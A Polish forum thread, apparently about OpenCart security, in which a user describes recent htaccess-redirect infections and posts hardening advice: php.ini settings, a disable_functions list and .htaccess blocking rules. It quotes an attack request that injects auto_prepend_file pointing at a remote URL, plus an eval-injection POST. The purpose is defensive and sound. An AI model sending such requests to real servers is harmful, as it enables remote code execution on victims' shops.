Witam
Właśnie dołączyłem do grona użytkowników zbanowanych i usuniętych z forum.opencart.com za ujawnienie podatności OC na atak i podanie zmian koniecznych do lepszego zabezpieczenia OC.
Rady zostały usunięte z głównego forum i nie poprawiono dokumentacji. Może poniższe uwagi wam się pomogą.
Ostatnie ataki objawiają się zmodyfikowanymi przez robala plikami htaccess które cały ruch robotów wyszukiwarek przekierowują na strony bandytów.
Poniżej zabezpieczenia przed atakami typu
# wstrzyknięcie exploita przez dauto_prepend_file
GET /index.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://wsdsf..fffm/a.txt'
# wstrzyknięcie exploita przez eval
POST /config.php?w1566t=1
Niezbędne korekty
dodatki do php.ini
allow_url_fopen = Off;
allow_url_include = Off;
#disable injection
auto_prepend_file =none;
expose_php = Off;
display_errors = Off;
display_startup_errors = Off ;
register_globals = Off;
#add eval to list
disable_functions = exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl;
dodatki do .htaccess
#Block access to configuration files like config.php, set chmod 444 too.
<FilesMatch "config.php">
Order deny,allow
Deny from all
</FilesMatch>
# Use this rule if you can't configure apache or php.ini
RewriteCond %{QUERY_STRING} auto_prepend_file
RewriteRule ^(.*)$ - [F,L]
Oczywiście najleszym sposobem jest odfiltrowanie calego ruchu z 'dauto_prepend_file' w nagłówkach i załatanie php.
Dzieki za post. Podejscie niektorych developerow i daniela jest dalekie od profesjonalego. Najlepiej to mozna zobaczyc po tym linku albo po issues list.
Code: Select all
http://blog.visionsource.org/2010/01/28/opencart-csrf-vulnerability/Quality Electronic Cigarettes in UK
Shopecigarette
Who is online
Users browsing this forum: No registered users and 3 guests
